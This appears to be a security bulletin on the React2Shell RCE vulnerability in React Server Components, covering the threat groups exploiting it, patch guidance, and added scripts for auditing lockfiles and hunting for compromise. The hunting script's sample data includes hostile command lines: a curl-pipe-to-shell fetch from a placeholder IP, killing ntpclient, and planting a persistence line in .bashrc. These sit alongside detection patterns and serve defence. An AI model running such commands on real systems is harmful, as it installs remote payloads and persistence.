Current Cyber Threats

Update: Google Links More Chinese Hacking Groups to React2Shell Attacks

Summary:
On December 3, 2025, a critical unauthenticated remote code execution (RCE) vulnerability in React Server Components (RSC), tracked as CVE-2025-55182 and informally known as "React2Shell", was publicly disclosed. Rated at the maximum CVSS score of 10.0, the flaw allows an attacker to compromise a server with a single crafted HTTP request aimed at the React "Flight" protocol, the serialized format RSC uses to exchange data between client and server. Since disclosure, Google Threat Intelligence Group (GTIG) has observed an immediate and diverse wave of exploitation across numerous regions. The vulnerability affects versions 19.0.0 through 19.2.0 of the react-server-dom-webpack, react-server-dom-parcel and react-server-dom-turbopack packages. Because Next.js bundles these packages for its App Router, the attack surface is vast, encompassing modern web applications across nearly every industry.
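As an added example (not code from the GTIG report or the React project), the following Node.js script checks a package-lock.json for the affected packages and version range described above and reports which of the follow-on fixes are also missing. The fixed-version thresholds per 19.x release line are taken from the React advisories (the 19.2.x values also appear under Suggested Corrections below; the 19.0.x and 19.1.x values do not appear on this page). The lockfile it reads is constructed sample input.

```javascript
'use strict';
// Added example (not code from the GTIG report or the React project): audit a
// package-lock.json (lockfileVersion 2/3) for React Server Components packages
// in the CVE-2025-55182 affected range and report which follow-on fixes are
// also missing. Fixed-version thresholds come from the React advisories; the
// 19.0.x/19.1.x values are not listed on this page. SAMPLE_LOCK is constructed input.

const RSC_PACKAGES = new Set([
  'react-server-dom-webpack',
  'react-server-dom-parcel',
  'react-server-dom-turbopack',
]);

// Minimum patch level per 19.x release line:
//   rce  = CVE-2025-55182 (RCE)
//   leak = CVE-2025-55183 (information disclosure)
//   dos  = CVE-2025-55184 + CVE-2025-67779 (the first DoS fix was incomplete)
const FIXED = {
  '19.0': { rce: '19.0.1', leak: '19.0.2', dos: '19.0.3' },
  '19.1': { rce: '19.1.2', leak: '19.1.3', dos: '19.1.4' },
  '19.2': { rce: '19.2.1', leak: '19.2.2', dos: '19.2.3' },
};

// "19.2.1-canary-abc" -> { nums: [19, 2, 1], pre: true }. A prerelease sorts below
// the same numeric version, so a 19.2.1 canary is still reported as < 19.2.1.
function parseVersion(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)(-[0-9A-Za-z.-]+)?$/.exec(v);
  if (!m) throw new Error(`unparseable version: ${v}`);
  return { nums: [Number(m[1]), Number(m[2]), Number(m[3])], pre: Boolean(m[4]) };
}

function compareVersions(a, b) {
  const pa = parseVersion(a);
  const pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (pa.nums[i] !== pb.nums[i]) return pa.nums[i] - pb.nums[i];
  }
  return (pa.pre ? 0 : 1) - (pb.pre ? 0 : 1);
}

// Which advisories a given package version still lacks a fix for.
function assess(name, version) {
  const { nums } = parseVersion(version);
  const line = `${nums[0]}.${nums[1]}`;
  const fixed = FIXED[line];
  if (!fixed) {
    return { name, version, missing: [], note: `release line ${line} not covered by this table` };
  }
  const missing = [];
  if (compareVersions(version, fixed.rce) < 0) missing.push('CVE-2025-55182 (RCE)');
  if (compareVersions(version, fixed.leak) < 0) missing.push('CVE-2025-55183 (info disclosure)');
  if (compareVersions(version, fixed.dos) < 0) missing.push('CVE-2025-55184/CVE-2025-67779 (DoS)');
  return { name, version, missing };
}

// Walk the "packages" map; keys look like "node_modules/foo" or, for nested
// installs, "node_modules/a/node_modules/foo".
function auditLockfile(lock) {
  const findings = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (!entry || !entry.version) continue;
    const name = path.split('node_modules/').pop();
    if (RSC_PACKAGES.has(name)) {
      findings.push({ path, ...assess(name, entry.version) });
    } else if (name === 'next') {
      // Next.js vendors its own copy under next/dist/compiled/, which never
      // appears in the lockfile, so the installed tree must be checked separately.
      findings.push({
        path, name, version: entry.version, missing: [],
        note: 'Next.js bundles RSC: check next/dist/compiled/react-server-dom-*/package.json and the Next.js advisory',
      });
    }
  }
  return findings;
}

// Constructed sample lockfile (not a real project).
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'sample-app', version: '1.0.0' },
    'node_modules/react': { version: '19.2.0' },
    'node_modules/react-server-dom-webpack': { version: '19.2.0' },
    'node_modules/react-server-dom-parcel': { version: '19.2.3' },
    'node_modules/next': { version: '16.0.1' },
    'node_modules/legacy-tool/node_modules/react-server-dom-turbopack': { version: '19.0.1' },
  },
};

console.log(JSON.stringify(auditLockfile(SAMPLE_LOCK), null, 2));
```

Run it against a real lockfile by replacing SAMPLE_LOCK with `JSON.parse(fs.readFileSync('package-lock.json'))`. Note that `react` itself is not in the list: the vulnerable code lives in the react-server-dom-* packages, and a Next.js application will only show `next` in the lockfile, which is why the script flags it for manual inspection rather than guessing.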

Google Threat Intelligence Group (GTIG) has documented a rapid transition from public disclosure to active weaponization by multiple high-tier threat actors. China-nexus espionage groups have been the most prolific, using the flaw to deploy a suite of specialized tools:

  • UNC6600: was observed deploying the MINOCAT tunneler, which combines a custom "NSS" wrapper with the Fast Reverse Proxy (FRP) client to bypass network defenses.
  • UNC6586: used the SNOWLIGHT downloader (a component of the VSHELL backdoor) to establish persistence and pull further payloads from its command-and-control (C2) infrastructure.
  • UNC6603: targeted cloud infrastructure in the APAC region with HISONIC, a Go-based implant that evades detection by hosting its configuration on legitimate cloud services such as Cloudflare Pages.
  • UNC6595: focused on international virtual private servers (VPS), deploying ANGRYREBEL.LINUX and applying anti-forensics techniques such as timestomping and clearing shell histories.

Beyond the Chinese activity, Iran-nexus actors were also identified exploiting CVE-2025-55182 within hours of its disclosure. These actors have focused on opportunistic, large-scale exploitation of exposed Next.js applications, often delivering multi-stage loaders and sophisticated implants such as EtherRAT, which features an unusual C2 channel built on Ethereum smart contracts. This rapid diversification of payloads, from state-sponsored backdoors to XMRig cryptocurrency miners, underscores a highly aggressive initial phase of mass exploitation conducted by distinct attackers across multiple regions.

Security Officer Comments:
The React2Shell event is a "perfect storm" for threat actors: a critical-impact vulnerability in a ubiquitous technology stack that can be exploited with a single unauthenticated HTTP request. The Iranian involvement is particularly significant because it shows the vulnerability being used both for intelligence collection and for more disruptive or experimental operations, such as testing blockchain-based C2 infrastructure. A major concern for defenders is the variety of valid payload formats: there is no single "signature" for the exploit request, so standard WAF rules are unlikely to achieve complete coverage and should be treated as a stopgap rather than a fix. Furthermore, the follow-on vulnerabilities (CVE-2025-55183 and CVE-2025-55184, plus CVE-2025-67779 for the incomplete DoS fix) show that the initial patch cycle was incomplete, so version checks must be repeated against the latest advisory rather than performed once. The analyst team notes that the targeting of cloud service providers likely points toward a strategic interest in the supply chains and data repositories of tech-heavy enterprises. The use of masqueraded filenames and hidden directories demonstrates a level of operational security intended to defeat basic endpoint monitoring.

Suggested Corrections:
Organizations utilizing React or Next.js should take the following actions immediately:
  1. Patch Immediately:
    1. To prevent remote code execution due to CVE-2025-55182, update React Server Components to at least 19.0.1, 19.1.2 or 19.2.1, whichever corresponds to the 19.x line you are running; 19.2.2 and 19.2.3 also contain this fix.
    2. To prevent the information disclosure impact of CVE-2025-55183, update to at least 19.2.2 (19.0.2 or 19.1.3 on the older lines).
    3. To prevent the denial-of-service impacts of CVE-2025-55184 and CVE-2025-67779, update to 19.2.3 (19.0.3 or 19.1.4 on the older lines). The 19.2.2 release fixed CVE-2025-55184 only partially, which is why CVE-2025-67779 was assigned.
  2. Deploy WAF Rules: Google has released a Cloud Armor web application firewall (WAF) rule designed to detect and block exploitation attempts for this vulnerability. We recommend deploying it as a temporary mitigation while your vulnerability management program patches and verifies every vulnerable instance; given the variety of valid payload formats, do not treat a WAF rule as a substitute for patching.
  3. Audit Dependencies: determine whether vulnerable React Server Components packages are present as direct or transitive dependencies of other applications in your environment. Note that Next.js vendors its own copy of these packages (under next/dist/compiled), so they will not appear in a lockfile; for Next.js applications, check the Next.js version against the Next.js advisory instead.
  4. Monitor Network Traffic: review logs for outbound connections to the indicators of compromise (IOCs) published in the linked GTIG report, and in particular for wget or curl commands spawned by web server processes.
  5. Hunt for Compromise: look for the creation of hidden directories such as $HOME/.systemd-utils, the unexpected termination of processes such as ntpclient, and malicious execution logic injected into shell configuration files such as $HOME/.bashrc.
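To make steps 4 and 5 concrete, here is an added example (not code from the GTIG report) of hunting logic run over constructed process-start events and a constructed ~/.bashrc. The event schema (pid, ppid, pcomm, comm, cmdline), the web-server process-name pattern and the allowlist of benign dot-directories are assumptions for this example, not any particular EDR's format; the address 203.0.113.10 is a documentation IP, not an IOC.

```javascript
'use strict';
// Added example (not code from the GTIG report): hunting logic for the
// post-exploitation behaviours listed in steps 4 and 5, run over constructed
// process-start events and a constructed ~/.bashrc. The event schema
// (pid, ppid, pcomm, comm, cmdline) and the web-server process-name pattern
// are assumptions for this example, not any particular EDR's format.

// Assumption: the Next.js/React server runs as "node" or a "next-server" worker.
const WEB_SERVER_RE = /^(node|next-server)/;
const DOWNLOADER_RE = /^(curl|wget)$/;
const SHELL_RE = /^(sh|bash|dash)$/;

// Walk the parent chain (via the events' own pid/ppid) so that
// node -> sh -c "curl ..." -> curl is still attributed to the web server.
function descendsFromWebServer(event, byPid, maxDepth = 8) {
  let cur = event;
  for (let depth = 0; cur && depth < maxDepth; depth++) {
    if (WEB_SERVER_RE.test(cur.pcomm)) return true;
    cur = byPid.get(cur.ppid);
  }
  return false;
}

// Each rule maps to one of the hunting items above.
const RULES = [
  {
    id: 'web-server-spawned-downloader',
    test: (e, byPid) => descendsFromWebServer(e, byPid) &&
      (DOWNLOADER_RE.test(e.comm) || (SHELL_RE.test(e.comm) && /\b(curl|wget)\b/.test(e.cmdline))),
  },
  { id: 'hidden-systemd-utils-dir', test: (e) => /\/\.systemd-utils\b/.test(e.cmdline) },
  { id: 'ntpclient-killed', test: (e) => /\b(pkill|killall|kill)\b[^|;&]*\bntpclient\b/.test(e.cmdline) },
  { id: 'bashrc-append', test: (e) => /(>>\s*\S*\.bashrc\b|tee\s+-a\s+\S*\.bashrc\b)/.test(e.cmdline) },
];

function huntEvents(events) {
  const byPid = new Map(events.map((e) => [e.pid, e]));
  const hits = [];
  for (const e of events) {
    const rules = RULES.filter((r) => r.test(e, byPid)).map((r) => r.id);
    if (rules.length) hits.push({ ts: e.ts, pid: e.pid, comm: e.comm, cmdline: e.cmdline, rules });
  }
  return hits;
}

// Shell rc files: flag lines that run something out of a hidden directory,
// ignoring a few common legitimate dot-directories (assumed allowlist).
const RC_ALLOWLIST = [/\/\.nvm\//, /\/\.cargo\//, /\/\.local\/bin/, /\/\.bashrc\.d\b/];
function scanShellRc(text) {
  const hits = [];
  text.split('\n').forEach((line, i) => {
    const t = line.trim();
    if (!t || t.startsWith('#')) return;
    const hiddenDir = /(?:\$HOME|~|\/home\/[^\/\s]+|\/root)\/\.[A-Za-z0-9_-]+\//.test(t);
    if (!hiddenDir || RC_ALLOWLIST.some((re) => re.test(t))) return;
    const executes = /\b(nohup|exec|setsid|sh|bash)\b|&\s*$|(?:^|\s)(?:\.|source)\s/.test(t);
    if (executes) hits.push({ line: i + 1, text: t });
  });
  return hits;
}

// Constructed sample data; 203.0.113.10 is a documentation address, not an IOC.
const SAMPLE_EVENTS = [
  { ts: '2025-12-04T01:12:03Z', pid: 1187, ppid: 1, pcomm: 'systemd', comm: 'node', cmdline: 'node server.js' },
  { ts: '2025-12-04T01:12:09Z', pid: 4012, ppid: 1187, pcomm: 'node', comm: 'sh', cmdline: 'sh -c "curl -fsSL http://203.0.113.10/i.sh | sh"' },
  { ts: '2025-12-04T01:12:09Z', pid: 4013, ppid: 4012, pcomm: 'sh', comm: 'curl', cmdline: 'curl -fsSL http://203.0.113.10/i.sh' },
  { ts: '2025-12-04T01:12:11Z', pid: 4021, ppid: 4012, pcomm: 'sh', comm: 'mkdir', cmdline: 'mkdir -p /home/app/.systemd-utils' },
  { ts: '2025-12-04T01:12:12Z', pid: 4022, ppid: 4012, pcomm: 'sh', comm: 'pkill', cmdline: 'pkill -9 ntpclient' },
  { ts: '2025-12-04T01:12:13Z', pid: 4023, ppid: 4012, pcomm: 'sh', comm: 'sh', cmdline: 'sh -c "echo nohup /home/app/.systemd-utils/sd >> /home/app/.bashrc"' },
  { ts: '2025-12-04T01:30:00Z', pid: 5100, ppid: 2200, pcomm: 'cron', comm: 'curl', cmdline: 'curl -s https://updates.example.internal/health' },
];
const SAMPLE_BASHRC = [
  '# ~/.bashrc',
  'export PATH="$HOME/.local/bin:$PATH"',
  '[ -s "$HOME/.nvm/nvm.sh" ] && . "$HOME/.nvm/nvm.sh"',
  'alias ll="ls -la"',
  'nohup /home/app/.systemd-utils/sd >/dev/null 2>&1 &',
].join('\n');

console.log(JSON.stringify({ events: huntEvents(SAMPLE_EVENTS), bashrc: scanShellRc(SAMPLE_BASHRC) }, null, 2));
```

The ancestry walk matters more than it looks: the web server rarely executes curl directly, it executes `sh -c "curl ... | sh"`, and the curl process then has sh as its parent. Matching only on the immediate parent would miss the download while still flagging the shell, so both get attributed to the web server here. The cron-spawned curl is deliberately left unflagged to show that the rule is about the process lineage, not the tool.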

Link(s):
https://cloud.google.com/blog/topic...at-actors-exploit-react2shell-cve-2025-55182/